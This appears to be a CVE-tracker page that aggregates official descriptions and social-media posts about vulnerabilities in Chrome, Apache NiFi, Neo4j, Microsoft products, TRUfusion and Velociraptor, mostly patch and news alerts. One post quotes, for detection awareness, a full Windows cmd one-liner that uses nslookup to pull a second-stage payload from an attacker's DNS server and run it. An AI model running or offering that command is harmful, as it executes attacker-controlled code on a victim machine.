24h | 7d | 30d

CVE-2026-2441

Overview

  • Google
  • Chrome
13 Feb 2026
Published
14 Feb 2026
Updated
CVSS
Pending
EPSS
0.03%
KEV

Description

Use after free in CSS in Google Chrome prior to 145.0.7632.75 allowed a remote attacker to execute arbitrary code inside a sandbox via a crafted HTML page. (Chromium security severity: High)

Statistics

  • 6 Posts
Last activity: 5 hours ago

Fediverse

Profile picture fallback
Anonymous :verified: @youranonnewsirc

Geopolitical: US-Iran nuclear talks resumed in Geneva (Feb 16). The Pentagon is also reviewing ties with Anthropic over AI usage safeguards (Feb 16). Tech: Majorana qubits were decoded, marking a breakthrough for robust quantum computing (Feb 16). Cybersecurity: Google patched an actively exploited Chrome zero-day (CVE-2026-2441), and Japan's Washington Hotel disclosed a ransomware attack from Feb 13.

#AnonNews_irc #Cybersecurity #News

  • 0
  • 0
  • 0
  • 10h ago
Profile picture fallback
Anonymous :verified: @youranonnewsirc

Google issued an emergency patch for an actively exploited Chrome zero-day (CVE-2026-2441) on Feb 16, 2026. A critical BeyondTrust vulnerability (CVE-2026-1731) is also under active exploitation. State-backed actors are increasingly using AI in cyberattacks. Geopolitically, the EU warned of Russia's evolving cyber warfare tactics. SpaceX and xAI are competing in a Pentagon AI drone tech contest.

#Cybersecurity #AI #Geopolitics

  • 0
  • 0
  • 0
  • 16h ago

Bluesky

Profile picture fallback
Spiegel's crawler @osanpo.bsky.social
> Release 1.109.4: fix: backport for CVE-2026-2441 from chromium (#295561) · microsoft/vscode https://github.com/microsoft/vscode/releases/tag/1.109.4
  • 0
  • 0
  • 0
  • 22h ago
Profile picture fallback
Sami Laiho @samilaiho.com
New Chrome Zero-Day (CVE-2026-2441) Under Active Attack — Patch Released URL: nvd.nist.gov/vuln/detail/... Classification: Critical, Solution: Official Fix, Exploit Maturity: Functional, CVSSv3.1: 8.8
  • 0
  • 0
  • 0
  • 12h ago
Profile picture fallback
Il Software @mm-ilsoftware-bot.bsky.social
Chrome, corretto il primo zero-day 2026 già sfruttato in attacchi Google ha corretto CVE-2026-2441, primo zero-day Chrome 2026 già sfruttato. Una falla use-... https://www.ilsoftware.it/chrome-corretto-il-primo-zero-day-2026-gia-sfruttato-in-attacchi/
  • 0
  • 0
  • 0
  • 9h ago
Profile picture fallback
Chris Heilmann @codepo8.bsky.social
🚨 Update Chrome NOW 🛎️ New Chrome Zero-Day (CVE-2026-2441) Under Active Attack — Patch Released thehackernews.com/2026/02/new-...
  • 0
  • 0
  • 0
  • 5h ago

CVE-2026-25903

Overview

  • Apache Software Foundation
  • Apache NiFi
  • org.apache.nifi:nifi-web-api
17 Feb 2026
Published
17 Feb 2026
Updated
CVSS v4.0
HIGH (8.7)
EPSS
0.03%
KEV

Description

Apache NiFi 1.1.0 through 2.7.2 are missing authorization when updating configuration properties on extension components that have specific Required Permissions based on the Restricted annotation. The Restricted annotation indicates additional privileges required to add the annotated component to the flow configuration, but framework authorization did not check restricted status when updating a component previously added. The missing authorization requires a more privileged user to add a restricted component to the flow configuration, but permits a less privileged user to make property configuration changes. Apache NiFi installations that do not implement different levels of authorization for Restricted components are not subject to this vulnerability because the framework enforces write permissions as the security boundary. Upgrading to Apache NiFi 2.8.0 is the recommended mitigation.

Statistics

  • 2 Posts
Last activity: 7 hours ago

Fediverse

Profile picture fallback
Offensive Sequence @offseq

🔥 HIGH severity vuln: CVE-2026-25903 in Apache NiFi 1.1.0 – 2.7.2 lets less-privileged users alter restricted component configs. Upgrade to 2.8.0 ASAP. Monitor permissions & flows! radar.offseq.com/threat/cve-20

  • 0
  • 0
  • 0
  • 9h ago

Bluesky

Profile picture fallback
BaseFortify.eu @basefortify.bsky.social
🚨 CVE-2026-25903 – Apache NiFi Missing authorization in Apache NiFi (1.1.0–2.7.2) allows less privileged users to modify properties of Restricted components. CVSS: 8.7 (HIGH) Full analysis: basefortify.eu/cve_reports/... #CVE #ApacheNiFi #CyberSecurity #Vulnerability #InfoSec
  • 0
  • 0
  • 0
  • 7h ago

CVE-2026-1622

Overview

  • neo4j
  • Enterprise Edition
04 Feb 2026
Published
04 Feb 2026
Updated
CVSS v4.0
MEDIUM (4.8)
EPSS
0.00%
KEV

Description

Neo4j Enterprise and Community editions versions prior to 2026.01.3 and 5.26.21 are vulnerable to a potential information disclosure by a user who has ability to access the local log files. The "obfuscate_literals" option in the query logs does not redact error information, exposing unredacted data in the query log when a customer writes a query that fails. It can allow a user with legitimate access to the local log files to obtain information they are not authorised to see. If this user is also in a position to run queries and trigger errors, this vulnerability can potentially help them to infer information they are not authorised to see through their intended database access. We recommend upgrading to versions 2026.01.3 (or 5.26.21) where the issue is fixed, and reviewing query log files permissions to ensure restricted access. If your configuration had db.logs.query.obfuscate_literals enabled, and you wish the obfuscation to cover the error messages as well, you need to enable the new configuration setting db.logs.query.obfuscate_errors once you have upgraded Neo4j.

Statistics

  • 2 Posts
Last activity: 20 hours ago

Bluesky

Profile picture fallback
nixpkgs security changes @nixpkgssecuritychanges.gerbet.me
[release-25.11] neo4j: 5.26.1 -> 5.26.21, fixes CVE-2026-1622 https://github.com/NixOS/nixpkgs/pull/491149 #security
  • 0
  • 0
  • 0
  • 22h ago
Profile picture fallback
nixpkgs prs bot @nixpkgs-prs-bot.bsky.social
#491151 google-alloydb-auth-proxy: 1.13.10 -> 1.13.11 #491149 [release-25.11] neo4j: 5.26.1 -> 5.26.21, fixes CVE-2026-1622 #491143 terraform-providers.oracle_oci: 8.0.0 -> 8.1.0 #491141 redu: add drdo as maintainer #491138 Firefox: 147.0.3 -> 147.0.4
  • 0
  • 0
  • 0
  • 20h ago

CVE-2024-43468

Overview

  • Microsoft
  • Microsoft Configuration Manager
08 Oct 2024
Published
12 Feb 2026
Updated
CVSS v3.1
CRITICAL (9.8)
EPSS
87.46%
KEV

Description

Microsoft Configuration Manager Remote Code Execution Vulnerability

Statistics

  • 1 Post
  • 15 Interactions
Last activity: 8 hours ago

Fediverse

Profile picture fallback
Christoph Schmees @PC_Fluesterer

Microsoft: Anderthalb Jahre alte Schwachstelle wird angegriffen

Im Oktober 2024 hat Microsoft (MS) eine Sicherheitslücke gestopft, die mit dem Risiko 9,8 von 10 eingestuft wurde. Oder sollten wir sagen: Hintertür? Die Schwachstelle CVE-2024-43468 besteht nämlich in einer unzureichenden Überprüfung und Reinigung von Benutzer-Eingaben. Will sagen: Wer die "passenden" Eingabewerte kennt, kann von Ferne und ohne Autorisierung Code ausführen (RCE, der GAU unter den Sicherheitslücken). Updates gegen diese Hintertür müssen sofort installiert werden - seit anderthalb Jahren! CVE-2024-43468 wurde gerade in den Katalog der bekanntermaßen ausgenutzten Sicherheitslücken (KEV) aufgenomm

pc-fluesterer.info/wordpress/2

#Allgemein #Hintergrund #Warnung #cybercrime #exploits #hintertür #Microsoft #UnplugTrump

  • 9
  • 6
  • 0
  • 8h ago

CVE-2026-20841

Overview

  • Microsoft
  • Windows Notepad
10 Feb 2026
Published
17 Feb 2026
Updated
CVSS v3.1
HIGH (7.8)
EPSS
0.08%
KEV

Description

Improper neutralization of special elements used in a command ('command injection') in Windows Notepad App allows an unauthorized attacker to execute code locally.

Statistics

  • 1 Post
  • 6 Interactions
Last activity: 14 hours ago

Bluesky

Profile picture fallback
Tech Trending @tech-trending.bsky.social
Microsoft、Windowsのメモ帳に余計なAI機能に加え、リモートコード実行の脆弱性まで付与 | XenoSpectrum https://xenospectrum.com/windows-notepad-vulnerability-cve-2026-20841-ai-markdown/
  • 2
  • 4
  • 0
  • 14h ago

CVE-2025-32355

Overview

  • Pending
17 Feb 2026
Published
17 Feb 2026
Updated
CVSS
Pending
EPSS
Pending
KEV

Description

Rocket TRUfusion Enterprise through 7.10.4.0 uses a reverse proxy to handle incoming connections. However, the proxy is misconfigured in a way that allows specifying absolute URLs in the HTTP request line, causing the proxy to load the given resource.

Statistics

  • 2 Posts
  • 4 Interactions
Last activity: 12 hours ago

Fediverse

Profile picture fallback
buherator @buherator
[RSS] When Audits Fail Part 2: From Pre-Auth SSRF to RCE in TRUfusion Enterprise (CVE-2025-32355, CVE-2025-59793)

https://www.rcesecurity.com/2026/02/when-audits-fail-from-pre-auth-ssrf-to-rce-in-trufusion-enterprise/
  • 1
  • 2
  • 0
  • 12h ago

Bluesky

Profile picture fallback
buherator @buherator.bsky.social
[RSS] When Audits Fail Part 2: From Pre-Auth SSRF to RCE in TRUfusion Enterprise (CVE-2025-32355, CVE-2025-59793) www.rcesecurity.com -> Original->
  • 0
  • 1
  • 0
  • 12h ago

CVE-2025-59793

Overview

  • Pending
17 Feb 2026
Published
17 Feb 2026
Updated
CVSS
Pending
EPSS
Pending
KEV

Description

Rocket TRUfusion Enterprise through 7.10.5 exposes the endpoint at /axis2/services/WsPortalV6UpDwAxis2Impl to authenticated users to be able to upload files. However, the application doesn't properly sanitize the jobDirectory parameter, which allows path traversal sequences to be included. This allows writing files to arbitrary local filesystem locations and may subsequently lead to remote code execution.

Statistics

  • 2 Posts
  • 4 Interactions
Last activity: 12 hours ago

Fediverse

Profile picture fallback
buherator @buherator
[RSS] When Audits Fail Part 2: From Pre-Auth SSRF to RCE in TRUfusion Enterprise (CVE-2025-32355, CVE-2025-59793)

https://www.rcesecurity.com/2026/02/when-audits-fail-from-pre-auth-ssrf-to-rce-in-trufusion-enterprise/
  • 1
  • 2
  • 0
  • 12h ago

Bluesky

Profile picture fallback
buherator @buherator.bsky.social
[RSS] When Audits Fail Part 2: From Pre-Auth SSRF to RCE in TRUfusion Enterprise (CVE-2025-32355, CVE-2025-59793) www.rcesecurity.com -> Original->
  • 0
  • 1
  • 0
  • 12h ago

CVE-2024-36351

Overview

  • Pending
Pending
Published
Pending
Updated
CVSS
Pending
EPSS
Pending
KEV

Description

This candidate has been reserved by a CVE Numbering Authority (CNA). This record will be updated by the assigning CNA once details are available.

Statistics

  • 1 Post
  • 2 Interactions
Last activity: 3 hours ago

Bluesky

Profile picture fallback
ferramentaslinux.bsky.social @ferramentaslinux.bsky.social
URGENT: #Ubuntu 24.04 LTS kernel updates (USN-8028-3) are live. Critical patches for AMD CPU data leaks (CVE-2024-36351) and SEV-SNP guest memory overwrite flaws. Read more: 👉 tinyurl.com/53wmvedk #Security
  • 0
  • 2
  • 0
  • 3h ago

CVE-2025-6264

Overview

  • Rapid7
  • Velociraptor
20 Jun 2025
Published
28 Nov 2025
Updated
CVSS v3.1
MEDIUM (5.5)
EPSS
0.06%
KEV

Description

Velociraptor allows collection of VQL queries packaged into Artifacts from endpoints. These artifacts can be used to do anything and usually run with elevated permissions.  To limit access to some dangerous artifact, Velociraptor allows for those to require high permissions like EXECVE to launch. The Admin.Client.UpdateClientConfig is an artifact used to update the client's configuration. This artifact did not enforce an additional required permission, allowing users with COLLECT_CLIENT permissions (normally given by the "Investigator" role) to collect it from endpoints and update the configuration. This can lead to arbitrary command execution and endpoint takeover. To successfully exploit this vulnerability the user must already have access to collect artifacts from the endpoint (i.e. have the COLLECT_CLIENT given typically by the "Investigator' role).

Statistics

  • 1 Post
  • 2 Interactions
Last activity: 12 hours ago

Fediverse

Profile picture fallback
TrustedAlpaca @TrustedAlpaca

cmd /c "nslookup example.com 192.168.1[.]1 | findstr "^Name:" | for /f "tokens=1,* delims=:" %a in ('more') do @echo %b" | cmd && exit\1

To an untrained eye, the above command might not look suspicious, as it uses a legitimate Windows tool called nslookup, but in reality the command is part of a staged infection as it delivers a second-stage payload via DNS that is controlled by the attacker.

Just because a legitimate executable runs commands doesn't mean that the binary itself or its parameters can't be abused to deliver or execute something malicious. The same goes for Velociraptor version 0.73.4.0, which contains a privilege escalation vulnerability under CVE-2025-6264. It is a legitimate DFIR tool, but because of its vulnerability, ransomware gangs use it to elevate privileges and execute malicious commands with higher privileges.

When detecting malicious activity, context and the commands executed are very important, because one technique used by threat actors to stay undetected as long as possible is abusing legitimate tools or built-in Windows executables to draw less attention to their malicious activities. To an untrained eye, such commands can look legitimate because the executables are reputable, they may be attributed as false positives or fly under the radar if detection engineering is not mature enough.

  • 0
  • 2
  • 0
  • 12h ago

CVE-2025-55812

Overview

  • Pending
Pending
Published
Pending
Updated
CVSS
Pending
EPSS
Pending
KEV

Description

This candidate has been reserved by a CVE Numbering Authority (CNA). This record will be updated by the assigning CNA once details are available.

Statistics

  • 2 Posts
Last activity: 5 hours ago

Fediverse

Profile picture fallback
Jim Guckin @JimGuckin

Old vuln, new life: React2Shell (CVE-2025-55812) is seeing a surge in active exploitation with reverse shells + cryptominers.

If your patching is based on CVSS instead of real-world activity, you’re already behind.

cybersecuritydive.com/news/rea

  • 0
  • 0
  • 1
  • 5h ago
Showing 1 to 10 of 33 CVEs